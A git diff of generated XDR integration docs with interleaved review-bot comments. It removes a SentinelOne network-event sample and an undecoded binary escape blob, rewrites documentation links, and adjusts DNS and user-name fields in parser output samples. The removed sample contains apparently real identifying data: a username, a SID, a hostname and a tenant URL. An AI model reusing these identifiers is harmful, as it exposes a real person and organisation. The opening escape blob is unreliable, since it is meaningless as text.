\u0c2d\ufc72+\u0470\u0d28\u0000\u2a2b\u1007\u0602\u2804\u00e0\u0a00\u080c\u0413\u1316\u2b05\u1114\u1104\u9a05\u020d\u0509\u3528\u0002\u1106\u1705\u1358\u1105\u1105\u8e04\u3269\u2ae4\u0000\u3013\u0004O\u0000n\u1100\u1703\ubf8d\u0000\u0c01\u1608\u4a72,\ua270\u6f08\u020c\u0600\u7203\u2768\u7000\u086f
\u0002\u0a06\u2802\u0217\u0600\u6c6f\u0001\u0606\uad6f\u0001\u0b0a\u0702\u1703\u4628\u0002\u7206\u2c54\u7000\u2807/\u2b00\u2807\u1034\u0600\u1e2a\u2802\u01ae\u0a00*\u301b\u0004X\u0000&\u1100\u0302\u2804\u0245\u0600\u012c\u022a\u0403\u4728\u0002\u2c06\u2a01\u0302\u2804\u0248\u0600\u012c\u022a\u6f04\u0205\u0600\u4c28\u0002\u0a06\u0403\uff6f\u0001\u0606\u2802\u0217\u0600\ua928\u0005\ufffd\u2614\u8872,\u0470\uff6f\u0001\u0606\u3028\u0000\ufe2b\u2a1a\u1001\u0000\u0000.\u4315\u1400\u0154\u0200\u3013\u0004h\u0000o\u1100\u6f04\u01ff\u0600\u030a\u1206\u2801\u05ab\u0600\u022d\u2a16\u2807\u05ac\u0600\u080c\u2814\u00d4\u0a00\u422c\u0307\u6f14\u01af\u0a00\ue974\u0000\u0d01\u0402\u2808\u024b\u0600\u0413\u0411\u082d\u2808\u0441\u0600\u0413\u1102\u0404\u2817\u0246\u0600\u1102\u0404\u4928\u0002\u0906\u0411\ub06f\u0001\u260a\u2a17\u2a16\u301b\u0004~\u0000p\u1100\u6f04\u0201\u0600\u3128\u0000\u0a2b\u6f06\u01b1\u0a00\u0413\u4e2b\u0412\ub228\u0001\u0b0a\u0112\u0e28\u0001\u0c0a\u0112\u0f28\u0001\u0d0a\u2c05\u080e\u6872'\u1b70\u946f\u0000\u2d0a\u0325\u0208\u2809\u024c\u0600\u2802\u0217\u0600\ua928\u0005\ufffd\u260f\ud472,\u0970\u28080\u2b00\u1afe\u0412\ub328\u0001\u2d0a\ufffd\u120e\ufe04\u8716\u0000\u6f1b\u0003\u0a00\u2adc\u0000\u1c01\u0000\u0000?\u5516\u0f00\u0154\u0200\u0002\u0014\u6f5b\u0e00\u0000\u0000\u3013\u0004A\u0000q\u1100\u6f04\u01ff\u0600\u030b\u1207\u2800\u05ab\u0600\u2d2c\u0402\u6f06\u01b4\u0a00\u4b28\u0002\u0c06\u2c08\u021c\u0408\u2817\u0246\u0600\u0802\u2804\u0249\u0600\u0306\u1408\ub56f\u0001\u170a\u162a*\u0000\u3013\u0004:\u0000r\u1100\u6f04\u0205\u0600\u022c\u2a16\u6f04\u01ff\u0600\u030a\u1206\u2801\u05ab\u0600\u022d\u2a16\u0307\u6f14\u01af\u0a00\u020c\u0408\u2817\u0246\u0600\u0802\u2804\u0249\u0600\u2a17\u0000\u301b\u0003?\u0000s\u1100\u6f04\u0203\u0600\u2c28\u0000\u0a2b\u6f06\u019a\u0a00\u2b0c\u1210\u2802\u019b\u0a00\u020b\u0703\u4428\u0002\u1206\u2802\u019c\u0a00\ue72d\u0ede\u0212\u16fe~\u1b00\u036f\u0000\ufffd*\u1001\u0000\u0002\u0013\u301d\u0e00\u0000\u0000\u3013\u0
004\u00b1\u0000t\u1100\u7204\u2768\u7000\u086f\u0002\u2806\u0230\u0600\u020a\u1728\u0002\u6f06\u0164\u0600\u6f06\u01a6\u0a00\u070b\u9575\u0001\u0c02\u2d08\u720b\u2d2a\u7000\u5573\f\u7a06\u0702\u1404\u3e28\u0002\u2b06\u081a\u856f\u000f\u7506\u0195\u0200\u080c\u0b2d\ua872-\u7370\u0c55\u0600\u087a\u856f\u000f\u2d06\u08de\u6f03\u0f86\u0600\u0307\u806f\f\u6f06\u0c81\u0600\u0303\u806f\f\u7206\u1dfd\u7000\u9928\u0000\u6f0a\u0c81\u0600\u3372.\u0770\u806f\f\u0706\ua56f\u0000\u6f0a\u00a6\u0a00\u6f03\u0c80\u0600\u3228\u0000\u072b*\u0000\u3013\u0003C\u0000&\u1100\u1ed0\u0001\u2802~\u0a00\u6f04\u01b6\u0a00\u022d\u2a14\u7203\u2768\u7000\u6f14\u020b\u0600\u3028\u0002\u0a06\u2d06\u1402\u022a\u1728\u0002\u6f06\u0168\u0600\u0602\u4c28\u0002\u6f06\u01b7\u0a00*\u301b\u0004i\u0000u\u1100\u0a03\u2802\u01ad\u0600\u3328\u0000\u0b2b\u6f07\u01b8\u0a00\u0413\u362b\u0412\ub928\u0001\u0c0a\u0212\u3f28\u0001\u0d0a\u2c09\u0623\u9f72.\u1270\u2802\u013e\u0a00\ua572.\u2870\u009d\u0a00\u6f09\u08c1\u0600\ub76f\u0000\u0a0a\u0412\uba28\u0001\u2d0a\ufffd\u120e\ufe04\u8a16\u0000\u6f1b\u0003\u0a00\u06dc*\u0000\u1001\u0000\u0002\u0016\u5943\u0e00\u0000\u0000\u023a\u2728\u0000\u020a\u2816\u0255\u0600\u1e2a\u7b02\u00c4\u0400\u222a\u0302\uc47d\u0000\u2a04\u0222\u6f03\u0257\u0600\u1e2a\u7b02\u00c6\u0400\u222a\u0302\uc67d\u0000\u2a04\u0000\u3013\u0002#\u0000]\u1100\u2802\u0258\u0600\u6f03\u00cf\u0600\u7e0a\u00c5\u0400\u6f06\u0093\u0a00\u072c\u2802\u0254\u0600\u162a\u322a\u8c17\u00cc\u0100\uc580\u0000\u2a04\u021e\u5328\u0002\u2a06\u0222\u2803\u00f2\u0600\u1e2a\u2802\u0253\u0600\u1e2a\u7b02\u00cd\u0400\u222a\u0302\ucd7d\u0000\u2a04\u021e\uce7b\u0000\u2a04\u0222\u7d03\u00ce\u0400\u1e2a\u7b02\u00cf\u0400\u222a\u0302\ucf7d\u0000\u2a04\u3013\u00031\u0000v\u1100\u2802\u0261\u0600\u032d\u2b1a\u1b01\u020a\u5f28\u0002\u0306\u486f\b\u0206\u6328\u0002\u0606\u956f\u0000\u160a\u0732\u2802\u0254\u0600\u162a\u1e2a\u2802\u025e\u0600\u1e2a\u7b02\u00d0\u0400\u222a\u0302\ud07d\u0000\u2a04\u021e\ud17b\u0000\u2a04\u0222\u7d03\u00d1\u
0400*\u3013\u00030\u0000v\u1100\u2802\u0267\u0600\u032d\u2b1a\u1b01\u020a\u5f28\u0002\u0306\u486f\b\u0206\u6928\u0002\u0606\u946f\u0000\u2c0a\u0207\u5428\u0002\u2a06\u2a16\u021e\u5e28\u0002\u2a06\u021e\ud27b\u0000\u2a04\u0222\u7d03\u00d2\u0400\u1e2a\u7b02\u00d3\u0400\u222a\u0302\ud37d\u0000\u2a04\u0000\u3013\u00033\u0000w\u1100\u2802\u026f\u0600\u032d\u2b1a\u1b01\u020a\u5f28\u0002\u0306\u486f\b\u0b06\u0207\u6d28\u0002\u0606\u956f\u0000\u160a\u072f\u2802\u0254\u0600\u162a\u1e2a\u2802\u025e\u0600\u1e2a\u2802\u025e\u0600\u1e2a\u7b02\u00d4\u0400\u222a\u0302\ud47d\u0000\u2a04\u021e\ud57b\u0000\u2a04\u0222\u7d03\u00d5\u0400*\u0000\u3013\u00030\u0000v\u1100\u2802\u0276\u0600\u032d\u2b1a\u1b01\u020a\u5f28\u0002\u0306\u486f\b\u0206\u7428\u0002\u0606\u946f\u0000\u2d0a\u0207\u5428\u0002\u2a06\u2a16\u0222\u2803\u0280\u0600\u322a\uf57e\u0002\u0204\u8028\u0002\u2a06\u7e32\u02f6\u0400\u2802\u0280\u0600\u322a\uf77e\u0002\u0204\u8028\u0002\u2a06\u7e32\u02f8\u0400\u2802\u0280\u0600\u322a\uf97e\u0002\u0204\u8028\u0002\u2a06\u7e32\u02fa\u0400\u2802\u0280\u0600*\u3013\u0003@\u0000x\u1100\u2503\u062d\u7e26[\u0a00\ubc28\u0001\u0a0a\u2806\u01bd\u0a00\u082d\u2806\u0b48\u0600\u052b\ud67e\u0000\u0b04\u0207\u8373\u0002\u0c06\u2c03\u080d\ua972.\u0370\u8f6f\u0002\u2606\u2a08\u282e\u0b43\u0600\ud680\u0000\u2a04\u0236\u7e03\u02f6\u0400\u8328\u0002\u2a06\u0000\u3013\u0003`\u0000y\u1100\u2802'\u0a00\u2d03\u720b\u065b\u7000\u2073\u0001\u7a0a\u1404\u2328\u000b\u2c06\u720b\u2ec7\u7000\u2073\u0001\u7a0a\u0302\ufffd\u0204\ud473\b\u0a06\u0406\ufffd\b\u0606\u6f03\u02b0\u0600\ue76f\b\u0606\u3328\u0010\u6f06\u1032\u0600\ufffd\u0606\ud77d\u0000\u2a04\u021e\ud77b\u0000\u2a04\u023a\ud77b\u0000\u0304\ue56f\b\u0206\u8a2a\u1403\u2328\u000b\u2c06\u720b\u2ec7\u7000\u2073\u0001\u7a0a\u7b02\u00d7\u0400\u6f03\u08dd\u0600\u2a02\u023a\ud77b\u0000\u0304\ue76f\b\u0206\u3a2a\u7b02\u00d7\u0400\u6f03\u08ea\u0600\u2a02\u3013\u0004%\u0000\u0013\u1100\u7b02\u00d7\u0400\u6f03\u08ea\u0600\u7b02\u00d7\u0400\u8d17\u0004\u0100\u060a\
u0416\u06a2\uec6f\b\u0206*\u0000\u3013\u0004)\u0000\u0013\u1100\u7b02\u00d7\u0400\u6f03\u08ea\u0600\u7b02\u00d7\u0400\u8d18\u0004\u0100\u060a\u0416\u06a2\u0517\u06a2\uec6f\b\u0206*\u0000\u3013\u0004.\u0000\u0013\u1100\u7b02\u00d7\u0400\u6f03\u08ea\u0600\u7b02\u00d7\u0400\u8d19\u0004\u0100\u060a\u0416\u06a2\u0517\u06a2\u0e18\ua204\u6f06\u08ec\u0600\u2a02\u0000\u3013\u00043\u0000\u0013\u1100\u7b02\u00d7\u0400\u6f03\u08ea\u0600\u7b02\u00d7\u0400\u8d1a\u0004\u0100\u060a\u0416\u06a2\u0517\u06a2\u0e18\ua204\u1906\u050e\u06a2\uec6f\b\u0206\u6a2a\u7b02\u00d7\u0400\u6f03\u08ea\u0600\u7b02\u00d7\u0400\u6f04\u08ec\u0600\u2a02\u029a\ud77b\u0000\u0304\uee6f\b\u0206\ud77b\u0000\u0404\uea6f\b\u0206\ud77b\u0000\u0504\uec6f\b\u0206\u8a2a\u2d03\u720b\u16ae\u7000\u2073\u0001\u7a0a\u7b02\u00d7\u0400\uf16f\b\u0306\u6f04\u01be\u0a00\u2a02\u301b\u0004X\u0000z\u1100\u2d03\u720b\u2ed9\u7000\u2073\u0001\u7a0a\u6f03\u01bf\u0a00\u026f\u0000\u0b0a\u1f2b\u6f07\u0005\u0a00\u020a\ud77b\u0000\u6f04\u08f1\u0600\u0306\u6f06\u01c0\u0a00\ube6f\u0001\u070a\u2a6f\u0000\u2d0a\ufffd\u0711\u0a75\u0000\u0c01\u2c08\u0806\u036f\u0000\ufffd\u2a02\u1001\u0000\u0002\u001a\u452b\u1100\u0000\u0000\u023a\ud77b\u0000\u0304\ufffd\u0206\u3e2a\u7b02\u00d7\u0400\u0403\ufc6f\b\u0206*\u3003\u0003G\u0000\u0000\u0000\u2c03\u020d\uef72.\u0370\u8f28\u0002\u2606\u2c04\u020d\ua972.\u0470\u8f28\u0002\u2606\u2c05\u0212\u1172/\u0570\ud08c\u0000\u2801\u028f\u0600\u0226\ufffd\u0204\ud77b\u0000\u6f04\u02b3\u0600*\u3003\u0003U\u0000\u0000\u0000\u2c03\u0308\uc16f\u0001\u2d0a\u2a01\u2c04\u020d\uef72.\u0470\u8f28\u0002\u2606\u2c05\u020d\ua972.\u0570\u8f28\u0002\u2606\u040e\u132c\u7202\u2f11\u7000\u040e\ud08c\u0000\u2801\u028f\u0600\u0226\ufffd\u0204\ud77b\u0000\u6f04\u02b3\u0600*\u0000\u3003\u0003M\u0000\u0000\u0000\u2d03\u2a01\u2c04\u020d\uef72.\u0470\u8f28\u0002\u2606\u2c05\u020d\ua972.\u0570\u8f28\u0002\u2606\u040e\u132c\u7202\u2f11\u7000\u040e\ud08c\u0000\u2801\u028f\u0600\u0226\ufffd\u0204\ud77b\u0000\u6f04\u02b3\u0600*\u0000\u3013\u
0002\n\u0000{\u1100\u0302\u8373\u0002\u0a06\u2a06\u0000\u3013\u0002\u000e\u0000{\u1100\u7e02\u02f5\u0400\u8373\u0002\u0a06\u2a06\u0000\u3013\u0002\u000e\u0000{\u1100\u7e02\u02f6\u0400\u8373\u0002\u0a06\u2a06\u0000\u3013\u0002\u000e\u0000{\u1100\u7e02\u02f7\u0400\u8373\u0002\u0a06\u2a06\u0000\u3013\u0002\u000e\u0000{\u1100\u7e02\u02f8\u0400\u8373\u0002\u0a06\u2a06\u0000\u3013\u0002\u000e\u0000{\u1100\u7e02\u02f9\u0400\u8373\u0002\u0a06\u2a06\u0000\u3013\u0002\u000e\u0000{\u1100\u7e02\u02fa\u0400\u8373\u0002\u0a06\u2a06\u0222\u2803\u02a4" - } - ``` - - - -=== "tcpv4" - - - ```json - { - "meta": { - "seqId": 51, - "uuid": "19f22913365942f2afeed1463c96104b", - "traceId": "620565A45ABA475FB419254BE2152CA4", - "agentVersion": "S1-WIN/21.5.7.370", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19042", - "computerName": "LAPTOP-COM11", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1631630518385" - }, - "event_type": "tcpv4", - "trueContext": { - "key": { - "value": "C5307F702A45841C" - } - }, - "source": { - "node": { - "key": { - "value": "CE27A4E72749E6F2" - } - }, - "executable": { - "node": { - "key": { - "value": "88D134761AF47342" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "64262984", - "signature": { - "signed": { - "identity": "MICROSOFT CORPORATION", - "valid": {} - } - }, - "hashes": { - "sha1": "c20704e15fa16fd333cf61c5611dc74299284d7d", - "sha256": "02cbdab1431442fbaa216a9361d3127c1de5a247db279aba9a4df421b973bdf4", - "md5": "3dcef51688df91a37bc07d8a261a9427" - }, - "fileLocation": "Local" - }, - "commandLine": "\"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE\" /vu \"C:\\Users\\l.maoui\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Outlook\\GMYOE03V\\S36 
-2021.xlsx\"", - "fullPid": { - "pid": 19376, - "startTime": { - "millisecondsSinceEpoch": "1631603628039" - } - }, - "user": { - "name": "CORP\\l.maoui", - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6168" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "9C0BFCE246E832C2" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Microsoft Excel", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "sessionId": 10, - "integrityLevel": "MEDIUM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "C5307F702A45841C" - } - }, - "counters": { - "moduleLoad": 1775, - "fileCreation": 136, - "fileDeletion": 63, - "fileModification": 436, - "netConnOut": 261, - "registryModification": 7653, - "dnsLookups": 108 - } - }, - "sourceAddress": { - "address": "10.26.8.27", - "port": 50965 - }, - "destinationAddress": { - "address": "52.182.143.208", - "port": 443 - }, - "direction": "OUTGOING", - "status": "SUCCESS" - } - ``` - - - diff --git a/_shared_content/operations_center/integrations/generated/8d024a2b-3627-4909-818d-26e1e3b2409c.md b/_shared_content/operations_center/integrations/generated/8d024a2b-3627-4909-818d-26e1e3b2409c.md index 1ce85b9109..21f3cedc2f 100644 --- a/_shared_content/operations_center/integrations/generated/8d024a2b-3627-4909-818d-26e1e3b2409c.md +++ b/_shared_content/operations_center/integrations/generated/8d024a2b-3627-4909-818d-26e1e3b2409c.md 
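Review bot: the removed `tcpv4` sample is the only block on this page that shows the network-connection shape of a SentinelOne event (`sourceAddress`/`destinationAddress`, `direction`, `status`) and it is deleted without a replacement; if the integration still emits `tcpv4` events, keep one sample with the identifying values (`CORP\l.maoui`, `LAPTOP-COM11`, the `S-1-5-21-...` SID, the `mgmtUrl` tenant) replaced by placeholders rather than dropping the whole block. Dropping the preceding run of `\uXXXX` escapes is fine, it is an undecoded binary payload that documents nothing. One value not to carry over into a replacement sample: `creationTime.millisecondsSinceEpoch` is `18446732429235951616`, which is 2^64 minus 11644473600000, i.e. the FILETIME epoch (1601-01-01) as a negative Unix millisecond count wrapped to unsigned, so the agent reported no creation time and the field should not be shown as if it held a real timestamp.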
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_event.json" diff --git a/_shared_content/operations_center/integrations/generated/8d8f040d-6a75-4bf4-bf1d-772e9a30f0dd.md b/_shared_content/operations_center/integrations/generated/8d8f040d-6a75-4bf4-bf1d-772e9a30f0dd.md index 9f461f90f1..80010f5bf5 100644 --- a/_shared_content/operations_center/integrations/generated/8d8f040d-6a75-4bf4-bf1d-772e9a30f0dd.md +++ b/_shared_content/operations_center/integrations/generated/8d8f040d-6a75-4bf4-bf1d-772e9a30f0dd.md 
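Review bot: this hunk and the identical `/docs/xdr/...` to `/xdr/...` link rewrites in the other `generated/*.md` files edit generator output; unless the template that emits the "Transformed Events Samples after Ingestion" paragraph is changed in the same commit, the next regeneration reverts every one of them. Please also confirm the new root-relative paths resolve when the docs are served under a `/docs` prefix, since dropping that prefix is the only change in these hunks.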
@@ -28,7 +28,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_antivirus_alert.json" diff --git a/_shared_content/operations_center/integrations/generated/8f472113-ba5b-45b9-9a2c-944834396333.md b/_shared_content/operations_center/integrations/generated/8f472113-ba5b-45b9-9a2c-944834396333.md index 90d926cf61..e6d033a989 100644 --- a/_shared_content/operations_center/integrations/generated/8f472113-ba5b-45b9-9a2c-944834396333.md +++ b/_shared_content/operations_center/integrations/generated/8f472113-ba5b-45b9-9a2c-944834396333.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "breach_reported_event.json" diff --git a/_shared_content/operations_center/integrations/generated/90179796-f949-490c-8729-8cbc9c65be55.md b/_shared_content/operations_center/integrations/generated/90179796-f949-490c-8729-8cbc9c65be55.md index bbb43576a3..68410ee73e 100644 --- a/_shared_content/operations_center/integrations/generated/90179796-f949-490c-8729-8cbc9c65be55.md +++ b/_shared_content/operations_center/integrations/generated/90179796-f949-490c-8729-8cbc9c65be55.md 
@@ -18,7 +18,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "DNS_Tunnel.json" @@ -150,7 +150,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "dns": { "question": { - "name": "_ldap._tcp.dc._msdcs.subdomain.corp.intra.", + "name": "_ldap._tcp.dc._msdcs.subdomain.corp.intra", "subdomain": "_ldap._tcp.dc._msdcs.subdomain.corp" }, "response_code": "NXDOMAIN", @@ -159,7 +159,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "related": { "hosts": [ - "_ldap._tcp.dc._msdcs.subdomain.corp.intra." + "_ldap._tcp.dc._msdcs.subdomain.corp.intra" ], "ip": [ "1.1.1.1" @@ -202,7 +202,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "dns": { "question": { - "name": "10.1.1.1_1.", + "name": "10.1.1.1_1", "subdomain": "10.1.1", "type": "A" }, 
@@ -212,7 +212,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "related": { "hosts": [ - "10.1.1.1_1." + "10.1.1.1_1" ], "ip": [ "10.1.1.1", @@ -255,7 +255,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "dns": { "question": { - "name": "emea.corp.", + "name": "emea.corp", "subdomain": "emea", "type": "A" }, @@ -265,7 +265,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "related": { "hosts": [ - "emea.corp." + "emea.corp" ], "ip": [ "1.1.1.1" @@ -310,7 +310,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "dns": { "question": { - "name": "substrate.office.com.", + "name": "substrate.office.com", "registered_domain": "office.com", "subdomain": "substrate", "top_level_domain": "com", @@ -322,7 +322,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "related": { "hosts": [ - "substrate.office.com." + "substrate.office.com" ], "ip": [ "1.1.1.1" diff --git a/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd.md b/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd.md index 51f3f3c690..99043dfd48 100644 --- a/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd.md +++ b/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd.md 
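Review bot: `dns.question.subdomain` is populated for names that are not domains: the `10.1.1.1_1` question yields `"subdomain": "10.1.1"` and `emea.corp` yields `"subdomain": "emea"`, both with no `registered_domain`, so a rule keyed on `dns.question.subdomain` will match on noise; set `subdomain` only when a `registered_domain` was actually found, as in the `substrate.office.com` sample. Stripping the trailing root dot from `dns.question.name` and `related.hosts` is right for ECS consistency, but any saved search that matched the dotted form (`substrate.office.com.`) stops matching after this change, so call it out as breaking in the changelog.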
@@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "User_id_1_csv.json" @@ -175,9 +175,13 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "@timestamp": "2021-02-28T18:20:54Z", + "action": { + "type": "radius" + }, "destination": { "user": { - "name": "paloaltonetwork\\\\xxxxx" + "domain": "paloaltonetwork", + "name": "xxxxx" } }, "host": { @@ -223,7 +227,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "xxxxx" ], "user": [ - "paloaltonetwork\\\\xxxxx" + "xxxxx" ] } } @@ -251,6 +255,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "@timestamp": "2021-03-01T20:35:54Z", + "action": { + "type": "end" + }, "destination": { "address": "1.1.1.1", "ip": "1.1.1.1", 
@@ -260,7 +267,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "port": 20122, "user": { - "name": "paloaltonetwork\\\\\\\\xxxxx" + "domain": "paloaltonetwork", + "name": "xxxxx" } }, "log": { @@ -298,7 +306,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "1.1.1.1" ], "user": [ - "paloaltonetwork\\\\\\\\xxxxx" + "xxxxx" ] }, "rule": { @@ -314,11 +322,13 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "port": 16524, "user": { - "name": "paloaltonetwork\\\\\\\\xxxxx" + "domain": "paloaltonetwork", + "name": "xxxxx" } }, "user": { - "name": "paloaltonetwork\\\\\\\\xxxxx" + "domain": "paloaltonetwork", + "name": "xxxxx" } } @@ -345,6 +355,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "@timestamp": "2021-03-01T21:06:06Z", + "action": { + "type": "file" + }, "destination": { "address": "1.1.1.1", "ip": "1.1.1.1", @@ -428,6 +441,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I { "message": "1,2023/06/16 10:41:44,001701003551,TRAFFIC,end,2305,2023/06/16 10:41:44,1.2.3.4,5.6.7.8,0.0.0.0,0.0.0.0,GEN_WINLOG_Users,domain\\pusername,userdest,windows-remote-management,vsys1,PDT_STD,INFRA_ADM,aaa.111,aaa.111,Syslog_Test,2023/06/16 10:41:44,234981,1,51413,5985,0,0,15,tcp,allow,2346,1974,372,9,90,16,30,0,69678105127,0x0,10.0.0.0-10.255.255.255,10.0.0.0-10.255.255.255,0,6,3,tcp-fin,0,0,0,0,,FWPA01,from-policy,,,0,,0,,N/A,0,0,0,0,5e7eca5b-f585-4633-bbd4-9ed431f7f95b,0,0,,,,,,,", "event": { + "action": "allow", "category": [ "network" ], @@ -486,7 +500,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "5.6.7.8" ], "user": [ - "domain\\pusername", + "pusername", "userdest" ] }, 
@@ -505,11 +519,13 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "packets": 6, "port": 51413, "user": { - "name": "domain\\pusername" + "domain": "domain", + "name": "pusername" } }, "user": { - "name": "domain\\pusername" + "domain": "domain", + "name": "pusername" } } @@ -523,6 +539,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I { "message": "1,2023/06/16 10:41:44,001701003551,TRAFFIC,end,2305,2023/06/16 10:41:44,1.2.3.4,5.6.7.8,0.0.0.0,0.0.0.0,GEN_WINLOG_Users,domainusername,destuser,windows-remote-management,vsys1,PDT_STD,INFRA_ADM,aaa.111,aaa.111,Syslog_Test,2023/06/16 10:41:44,234981,1,51413,5985,0,0,0x1c,tcp,allow,2346,1974,372,9,2023/06/16 10:41:26,16,not-resolved,0,69678105127,0x0,10.0.0.0-10.255.255.255,10.0.0.0-10.255.255.255,0,6,3,tcp-fin,0,0,0,0,,FWPA01,from-policy,,,0,,0,,N/A,0,0,0,0,5e7eca5b-f585-4633-bbd4-9ed431f7f95b,0,0,,,,,,,", "event": { + "action": "allow", "category": [ "network" ], @@ -631,6 +648,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "@timestamp": "2021-03-01T20:35:54Z", + "action": { + "name": "satellite-gateway-update-route", + "type": "globalprotect" + }, "host": { "hostname": "machine_name2", "name": "machine_name2", @@ -665,16 +686,18 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "machine_name2" ], "user": [ - "xxxxx\\\\\\\\xxxxx" + "xxxxx" ] }, "source": { "user": { - "name": "xxxxx\\\\\\\\xxxxx" + "domain": "xxxxx", + "name": "xxxxx" } }, "user": { - "name": "xxxxx\\\\\\\\xxxxx" + "domain": "xxxxx", + "name": "xxxxx" } } @@ -804,7 +827,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "88.120.236.74" ], "user": [ - "example.org\\\\test" + "test" ] }, "source": { 
